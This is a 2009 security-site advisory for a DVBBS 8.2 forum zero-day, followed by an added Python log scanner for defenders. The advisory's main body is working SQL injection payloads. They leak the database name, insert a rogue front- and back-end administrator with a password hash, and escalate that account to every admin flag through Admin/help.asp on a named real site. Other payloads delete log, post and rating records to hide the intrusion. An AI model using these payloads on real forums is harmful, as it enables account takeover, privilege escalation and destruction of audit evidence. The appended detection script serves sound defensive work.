DVBBS 8.2 front-end 0day - Vulnerability Warning - Black Bar Safety Net

2009-12-24T00:00:00
ID MYHACK58:62200925695
Type myhack58
Reporter Anonymous
Modified 2009-12-24T00:00:00

Description

Small aviation blog

Usage: create a post whose title is one of the SQL statements below, then comment on it. 0 is neutral, 1 is support, 2 is opposition. The SQL statement is executed at this point.

Database name:

    a’,’,1,’hang’,’2008-2-4’,’,2);update//dv_user//set//useremail=db_name()//where//username=’hang’--

Add a front-end and back-end administrator:

    a’,’,1,’hang’,’2008-2-4’,’,2);update dv_user set UserGroupID=1 where username=’hang’;insert into dv_admin(Username,Password,Flag,Adduser)values(’hang’,’965eb72c92a549dd’,’,4,’,’hang’)--

Once in the back end, inject again to obtain all permissions:

    http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;update//dv_admin//set//flag=’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45’//where//username=’hang’--

Clean up the records in three database tables:

    http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;delete//from//dv_log//where//l_username=’hang’;delete//from//dv_topic// where//PostUsername=’hang’;delete//from//Dv_Appraise//where//UserName=’hang’--

(Because the delete statement is executed through the back-end injection, Dv_log will still end up containing one record of the back-end access to the help.asp file.)
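
The back-end requests above all pass extra statements after id=1 to Admin/help.asp, and the closing remark notes that this access is still recorded. The following is an added example for defenders, not part of the original advisory: it scans web server log lines for a non-numeric id sent to that page. It assumes id is normally a plain integer and that logs use the W3C field order shown in the sample; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: help.asp expects a purely numeric id (the advisory's requests start with id=1).
NUMERIC_ID = re.compile(r"^\d+$")
SQL_VERBS = re.compile(r"\b(update|delete|insert|select|drop|exec)\b", re.I)

def query_params(query):
    """Split on '&' only, so a ';' inside a value stays part of that value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key.lower()] = unquote_plus(value)
    return params

def inspect(stem, query):
    """Return a finding for a non-numeric id sent to Admin/help.asp, else None."""
    if not stem.lower().endswith("/admin/help.asp"):
        return None
    value = query_params(query).get("id")
    if value is None or NUMERIC_ID.match(value):
        return None
    verbs = sorted({v.lower() for v in SQL_VERBS.findall(value)})
    return {"id": value, "stacked": ";" in value, "verbs": verbs}

def scan_log(lines):
    """Scan lines laid out as: date time method uri-stem uri-query status."""
    findings = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue  # skip directives and malformed lines
        date, time, _method, stem, query = fields[:5]
        hit = inspect(stem, query)
        if hit:
            findings.append({"when": f"{date} {time}", **hit})
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2009-12-24 10:00:01 GET /Admin/help.asp action=view&id=1 200",
    "2009-12-24 10:00:09 GET /Admin/help.asp action=view&id=1;delete+from+example_table+where+name='x'-- 200",
    "2009-12-24 10:00:15 GET /index.asp id=1;select+1 200",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit on this page is worth correlating with unexpected rows in dv_admin and with gaps in dv_log for the same account.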